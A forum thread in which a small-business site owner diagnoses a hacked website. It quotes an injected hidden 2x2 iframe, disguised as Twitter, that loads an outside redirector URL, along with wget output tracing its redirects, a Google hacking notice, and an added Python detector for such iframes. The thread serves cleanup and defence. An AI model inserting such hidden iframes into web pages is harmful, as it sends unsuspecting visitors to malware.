12 Replies - 365 Views - Last Post: 07 June 2013 - 04:49 PM

#1 L2g2h

Website help?

Posted 26 May 2013 - 11:25 AM

Long story short, here goes.

I'm working to try to learn website coding so that I could help my family's business with website maintenance as they have been subject to local companies or companies in general charging what they want and making changes that aren't planned for or asked for.

My reason for posting is that they have hired a new company to redesign the website, it's been done and they like it. Difficulty is anytime a customer uses google chrome in the market area (or anywhere really just people in the area seem to use chrome not to mention it has highest share usage out of browsers) there is a google warning about trojans. I called the company for them though they deny any involvement, saying it is our hosting company and we need to fire the current hosting company then go with them.

I know this can't possibly be true as there have only been trojan warnings upon changing the company involved for web design. There was a two week period where there were no warnings about trojans. How do I catch them at their game or more importantly get this removed as in our small market customers are getting upset then calling in to complain or outrage. Help?

Website: www.twincityserviceco.com


Replies To: Website help?

#2 modi123_1

Re: Website help?

Posted 26 May 2013 - 02:23 PM

You need to clean out whatever is on the hosted site (be it actual malware or ads that link to them), and then petition Google, etc. who are flagging the site that your account is clean.

#3 JackOfAllTrades

Re: Website help?

Posted 26 May 2013 - 02:24 PM

There is a suspicious iframe at the bottom of your main page pages that LOOKS like it's related to Twitter, but it's not.

This suggests that perhaps someone has access to your account on the host.

This post has been edited by JackOfAllTrades: 26 May 2013 - 02:29 PM
Reason for edit:: Found on other pages too


#4 L2g2h

Re: Website help?

Posted 26 May 2013 - 04:55 PM

modi123_1, on 26 May 2013 - 02:23 PM, said:

You need to clean out whatever is on the hosted site (be it actual malware or ads that link to them), and then petition Google, etc. who are flagging the site that your account is clean.



JackOfAllTrades, on 26 May 2013 - 02:24 PM, said:

There is a suspicious iframe at the bottom of your main page pages that LOOKS like it's related to Twitter, but it's not.

This suggests that perhaps someone has access to your account on the host.


Thank you both very much, confirms that there is something way wrong here. I look at the page(s) though I don't see an "iframe" or mention of twitter on the page. When I look into the page source and paste it into wordpad++ I find the following

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://silverleaf-hoa.com/mqbg.html?i=1971425></iframe> 



The code snippet is at the bottom of the page where the body ends. I'm presuming that is what you're talking about, JackOfAllTrades?

#5 JackOfAllTrades

Re: Website help?

Posted 26 May 2013 - 05:42 PM

Yes, that's it. The good thing is that where it's sending people is currently resulting in a 404:

wget "http://silverleaf-hoa.com/mqbg.html?i=1971425" -O silverleaf.html
--20:40:28--  http://silverleaf-hoa.com/mqbg.html?i=1971425
           => `silverleaf.html'
Resolving silverleaf-hoa.com... 184.154.233.7
Connecting to silverleaf-hoa.com|184.154.233.7|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://scl-nielsen.com/mqbg.html?i=1971425 [following]
--20:40:29--  http://scl-nielsen.com/mqbg.html?i=1971425
           => `silverleaf.html'
Resolving scl-nielsen.com... 207.158.54.100
Connecting to scl-nielsen.com|207.158.54.100|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
20:40:29 ERROR 404: Not Found.



I would suggest changing your password and verifying permissions on all files.

#6 L2g2h

Re: Website help?

Posted 26 May 2013 - 05:44 PM

JackOfAllTrades, on 26 May 2013 - 05:42 PM, said:

Yes, that's it. The good thing is that where it's sending people is currently resulting in a 404:

wget "http://silverleaf-hoa.com/mqbg.html?i=1971425" -O silverleaf.html
--20:40:28--  http://silverleaf-hoa.com/mqbg.html?i=1971425
           => `silverleaf.html'
Resolving silverleaf-hoa.com... 184.154.233.7
Connecting to silverleaf-hoa.com|184.154.233.7|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://scl-nielsen.com/mqbg.html?i=1971425 [following]
--20:40:29--  http://scl-nielsen.com/mqbg.html?i=1971425
           => `silverleaf.html'
Resolving scl-nielsen.com... 207.158.54.100
Connecting to scl-nielsen.com|207.158.54.100|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
20:40:29 ERROR 404: Not Found.



I would suggest changing your password and verifying permissions on all files.


I'm sorry, I don't understand that snippet. Sorry for being less educated on this.

I'm working to change that text on the htmls and changing the ftp infos now.

#7 JackOfAllTrades

Re: Website help?

Posted 26 May 2013 - 05:55 PM

It means that the request to the first one is redirected to the second, but that fails. The redirection is how this stuff usually works. It bounces from compromised host to compromised host until it finally grabs a malicious binary which installs in the browser of unsuspecting people with poor security settings (usually using Internet Explorer and running under an administrator account).

#8 L2g2h

Re: Website help?

Posted 26 May 2013 - 06:35 PM

JackOfAllTrades, on 26 May 2013 - 05:55 PM, said:

It means that the request to the first one is redirected to the second, but that fails. The redirection is how this stuff usually works. It bounces from compromised host to compromised host until it finally grabs a malicious binary which installs in the browser of unsuspecting people with poor security settings (usually using Internet Explorer and running under an administrator account).


Thank you. I'm making the changes and will save a before and after folder of the site so I can talk to them next business day they're open and get on the job with my google webmaster tools to see if I can get it recrawled/re-evaluated.

Thanks so much!

#9 L2g2h

Re: Website help?

Posted 30 May 2013 - 02:42 PM

So I come back here looking for further assistance. Thanks again.

So I found there was a .dwt file in the files that the company uploaded. I know enough to know that it's a Dreamweaver Template file, so I figured if I am able to access the file, then correct the malicious code out of it, I might be in better luck than manually correcting each file. I think there are roughly 20-30.

Oh well. I will manually work on correcting the individual files.

I am concerned as to what this error might pertain to. I'm thinking I don't have file permission or some such? I have the information for the overall hosting account and reconfirmed the FTP user account I'm using has full permissions.

Clueless

Anyways here's the error.

There is an error at line 101, column 9 (absolute position 6416) of "C:\Users\(username)\AppData\Roaming\Adobe\Dreamweaver9\Configuration\ServerConnections\TwinCityService\htdocs\TwinCitySrvc\master.dwt":unexpected end-of-file



#10 L2g2h

Re: Website help?

Posted 30 May 2013 - 02:51 PM

So I come back here looking for further assistance. Thanks again.

So I found there was a .dwt file in the files that the company uploaded. I know enough to know that it's a Dreamweaver Template file, so I figured if I am able to access the file, then correct the malicious code out of it, I might be in better luck than manually correcting each file. I think there are roughly 20-30.

Oh well. I will manually work on correcting the individual files.

I am concerned as to what this error might pertain to. I'm thinking I don't have file permission or some such? I have the information for the overall hosting account and reconfirmed the FTP user account I'm using has full permissions.

Clueless

Anyways here's the error.

There is an error at line 101, column 9 (absolute position 6416) of "C:\Users\(username)\AppData\Roaming\Adobe\Dreamweaver9\Configuration\ServerConnections\TwinCityService\htdocs\TwinCitySrvc\master.dwt":unexpected end-of-file




#11 JackOfAllTrades

Re: Website help?

Posted 31 May 2013 - 03:04 AM

I don't know what the DW template file looks like (IMO, DW is for people who don't really know how to code), so it's hard to say exactly. Something is missing that indicates to whatever is reading that file that the file has ended.

#12 L2g2h

Re: Website help?

Posted 07 June 2013 - 04:20 PM

Thank you again, especially JackOfAllTrades for all the assistance.

I have another issue with the site! Difficulty being I'm trying to narrow down what is causing this issue. I have included the email I got from Google Webmaster Tools on 6.6.13 1:39AM. On 6.5.13 my family's small town business gave a new FTP user id and pw to the contracted website company as while I was editing out the previous issue I changed the credentials they had.

Message summary

Webmaster Tools sent you the following important messages about sites in your account. To keep your site healthy, we recommend regularly reviewing these messages and addressing any critical issues.

Notice of Suspected Hacking on http://www.twincityserviceco.com/

Dear site owner or webmaster of http://www.twincityserviceco.com/,

We are writing to let you know that we believe some of your website's pages may be hacked. Specifically, we think that Javascript has been injected into your site by a third party and may be used to redirect users to malicious sites. You should check your source code for any unfamiliar Javascript and in particular any files containing "iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 ". The malicious code may be placed in HTML, Javascript or PHP files so it's important to be thorough in your search.

The following are example URLs from your site where we found such content:

http://www.twincityserviceco.com/
http://www.twincityserviceco.com/faq-hvac.html
http://www.twincityserviceco.com/get-estimate.html

In addition, it's also possible your server configuration files (such as Apache's .htaccess) have been compromised. As a result of this, your site may be cloaking and showing the malicious content only in certain situations.

We encourage you to investigate this matter in order to protect your visitors. If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but also to identify and fix the vulnerability. A good first step may be to contact your web host's technical support for assistance. It's also important to make sure that your website's software is up-to-date with the latest security updates and patches.

More information about cleaning your site can be found at:

http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163634

Sincerely, Google Search Quality Team


Below I included the short email the contracted company sent us.

Hi William,
 
We are seeing the same iFrame problem.  There is nothing in our code that would create this, so it must still be Malware on the server.  This is not something that Network Solutions would install.  Malware was previously on your server.  We thought we had it all removed when we updated your site, but there must still be something left.  
 
When we tried to get into your server, it told us that the username and password had changed.  We will need the updated FTP username and password to get back in and remove the current Malware problem.  Can you provide that for me?
 
Thank you!
Rob



How might I distinguish if files on the ftp server are indeed malicious or not?
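A check for the pattern the Google notice describes, as an added example that is not part of any post in this thread: it scans a local copy of the site for off-site iframes that are tiny or hidden. The host `redirector.example`, the sample markup and all function names are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# File types named in the Google notice, plus Dreamweaver templates (.dwt).
SCAN_EXT = {".html", ".htm", ".php", ".js", ".dwt"}
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)

def parse_attrs(tag_body):
    """Parse quoted and unquoted attributes (the injected tag uses unquoted ones)."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag_body)}

def is_tiny(value, limit=5):
    """True for a pixel size too small to be a visible frame, e.g. width=2."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.IGNORECASE)
    return bool(m) and int(m.group(1)) <= limit

def suspicious_iframes(text, own_hosts):
    """Return (line_number, src) for each off-site iframe that is tiny or hidden."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        offsite = bool(host) and host not in own_hosts
        invisible = (is_tiny(attrs.get("width")) or is_tiny(attrs.get("height"))
                     or bool(HIDDEN_RE.search(attrs.get("style", ""))))
        if offsite and invisible:
            hits.append((text.count("\n", 0, m.start()) + 1, src))
    return hits

def scan_tree(root, own_hosts):
    """Scan a local copy of the site; returns (relative_path, line, src) tuples."""
    results = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_EXT:
            text = path.read_text(encoding="utf-8", errors="replace")
            results.extend((str(path.relative_to(root)), n, s) for n, s in suspicious_iframes(text, own_hosts))
    return results

# Constructed sample: the attribute pattern from the thread, with a placeholder host.
SAMPLE = ('<body>\n<iframe src="https://www.youtube.com/embed/x" width="560" height="315"></iframe>\n'
          '<iframe name=Twitter scrolling=auto frameborder=no align=center '
          'height=2 width=2 src=http://redirector.example/a.html?i=1></iframe>\n</body>')

if __name__ == "__main__":
    print(suspicious_iframes(SAMPLE, {"www.twincityserviceco.com"}))
```

A clean result here covers only literal iframe tags in the scanned files; script-generated frames and the .htaccess cloaking the notice mentions need separate review.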

#13 andrewsw

Re: Website help?

Posted 07 June 2013 - 04:49 PM

Why not let Rob do the sweeping for you?